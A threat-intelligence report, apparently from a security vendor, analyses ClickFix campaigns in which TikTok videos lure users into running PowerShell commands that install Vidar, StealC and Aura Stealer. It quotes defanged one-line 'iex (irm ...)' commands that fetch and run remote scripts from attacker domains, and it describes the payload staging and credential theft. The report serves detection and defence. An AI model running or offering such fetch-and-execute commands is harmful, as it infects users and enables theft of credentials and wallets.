Executive Summary

The proliferation of TikTok as a global social media platform has introduced a new and highly effective vector for cybercriminals to distribute information-stealing malware, commonly referred to as infostealers. Recent intelligence has identified a surge in the use of the so-called ClickFix attack technique, wherein threat actors publish short, engaging TikTok videos that purport to offer free activation or cracked versions of popular software such as Windows, Spotify, Netflix, Adobe, and Discord Nitro. These videos instruct viewers to execute a single-line PowerShell command, which, when run with administrative privileges, initiates the download and execution of infostealer malware. The primary payloads observed in these campaigns are variants of Vidar, StealC, and Aura Stealer. The attacks are highly automated, leveraging AI-generated content, dynamic infrastructure, and legitimate cloud hosting services to evade detection and maximize reach. This report provides a comprehensive technical analysis of the attack chain, threat actor tactics, exploitation in the wild, victimology, and actionable mitigation strategies.

Threat Actor Profile

The threat actors behind the ClickFix campaigns are financially motivated cybercriminals, not currently attributed to any known Advanced Persistent Threat (APT) group. Their operations are characterized by opportunistic targeting, rapid infrastructure turnover, and the use of social engineering at scale. The attackers exploit the trust and virality of TikTok to reach a broad, global audience, focusing on users seeking unauthorized software activations. The campaigns are notable for their use of AI-generated video content, which increases the volume and diversity of lures while reducing operational overhead. The actors employ dynamic domain generation, cloud-based payload hosting (notably via Cloudflare Pages), and abuse of legitimate services such as Telegram and Steam for command-and-control (C2) communication and dead drop resolving. The monetization strategy centers on harvesting credentials, authentication cookies, and cryptocurrency wallets, which are then sold or used for further financial gain.

Technical Analysis of Malware/TTPs

The ClickFix attack chain is a sophisticated blend of social engineering, living-off-the-land techniques, and multi-stage malware delivery. The initial infection vector is a TikTok video, often AI-generated, that demonstrates a one-line PowerShell command. This command typically takes the form:

iex (irm hxxps://allaivo[.]me/spotify)

or

iex (irm slmgr[.]win/photoshop)

The command uses Invoke-Expression (iex) and Invoke-RestMethod (irm) to fetch and execute a remote script from a domain that changes based on the impersonated software. The script performs several actions:

It creates hidden directories in APPDATA and LOCALAPPDATA and adds these locations to the Windows Defender exclusion list, effectively disabling local antivirus scanning for subsequent payloads.

It downloads a secondary payload, typically named updater.exe or file.exe, from a cloud-hosted location such as file-epq[.]pages[.]dev or amssh[.]co. This executable is a variant of Vidar, StealC, or Aura Stealer.

The payload is executed as a hidden, elevated process. In some cases, an additional executable (source.exe) is downloaded, which self-compiles code using the .NET Visual C# Compiler and injects it into memory, further obfuscating the attack.

Persistence is established by downloading and executing a PowerShell script (script.ps1) that sets up a registry key and deletes temporary folders to minimize forensic traces.

The infostealer exfiltrates browser credentials, authentication cookies, cryptocurrency wallets, and credentials from other applications. Exfiltration is performed via encrypted channels to C2 infrastructure, which may include Telegram bots, Steam profiles, and direct HTTP POST requests to attacker-controlled servers.

The attackers use legitimate services as dead drop resolvers, making C2 infrastructure highly resilient and difficult to disrupt. The use of Cloudflare Pages and similar services for payload hosting further complicates detection and takedown efforts.

Exploitation in the Wild

The ClickFix campaigns have been active since at least May 2025, with a marked increase in activity observed through October 2025. The attacks are global in scope, with no specific country or sector targeting. Victims are primarily individuals seeking free or pirated software activations, a demographic that spans all age groups and geographies due to the international reach of TikTok. Notable TikTok accounts used in these campaigns include @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771 (now inactive). The attackers frequently rotate accounts and domains to evade detection and platform enforcement.

The payloads delivered in the wild include Vidar, StealC, and Aura Stealer, each capable of harvesting a wide range of sensitive data. The campaigns have been observed leveraging dynamic URLs, AI-generated video content, and rapid infrastructure turnover. The use of legitimate cloud services for payload delivery and C2 communication has enabled the attackers to maintain high operational tempo and evade traditional security controls.

Victimology and Targeting

The primary victims of ClickFix attacks are end-users who are enticed by the promise of free or cracked software. These users are typically not security-savvy and may lack enterprise-grade endpoint protection. The attacks are indiscriminate, affecting individuals across all sectors and geographies. There is no evidence of targeting based on industry, organization, or country; rather, the attackers cast a wide net to maximize infection rates. The use of TikTok as the delivery platform ensures that the campaigns reach a diverse and global audience. The attackers exploit the platform's recommendation algorithms and viral content dynamics to amplify the reach of their lures. The demographic most at risk includes younger users and those with a propensity to seek unauthorized software, but the campaigns have the potential to impact any user exposed to the malicious content.

Mitigation and Countermeasures

Organizations and individuals can take several steps to mitigate the risk posed by ClickFix infostealer campaigns. First, block access to known malicious domains such as slmgr[.]win, file-epq[.]pages[.]dev, allaivo[.]me, and amssh[.]co at the network perimeter. Implement monitoring and alerting for suspicious PowerShell execution, particularly commands that use the iex (irm ...) pattern. Endpoint detection and response (EDR) solutions should be configured to flag and quarantine downloads of executables with suspicious names such as updater.exe, file.exe, and source.exe from cloud-hosted sources.

User education is critical: organizations should conduct awareness campaigns warning users against running PowerShell commands copied from social media or unknown sources. If compromise is suspected, immediately reset all credentials, review for unauthorized access, and perform a thorough forensic analysis of affected endpoints. Security teams should update detection rules to include the latest indicators of compromise (IOCs) associated with these campaigns.

For organizations with significant exposure to social media-driven threats, consider implementing application whitelisting, restricting the execution of PowerShell scripts, and enforcing the principle of least privilege on user accounts. Regularly review and update security policies to address emerging social engineering tactics and the abuse of legitimate cloud services for malware delivery.

References

BleepingComputer: TikTok videos continue to push infostealers in ClickFix attacks

Trend Micro: TikTok Videos Promise Pirated Apps, Deliver Vidar and StealC Infostealers

Help Net Security: TikTok videos + ClickFix tactic = Malware infection

MITRE ATT&CK: T1059.001 - PowerShell

MITRE ATT&CK: T1566.002 - Spearphishing via Service

VirusTotal: updater.exe sample

ISC Handler Xavier Mertens: @xme on Twitter

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their extended supply chain. Our platform leverages advanced threat intelligence, continuous monitoring, and automated workflows to deliver actionable insights and enhance your organization’s security posture. For more information or to discuss how Rescana can help you manage cyber risk, we are happy to answer questions at ops@rescana.com.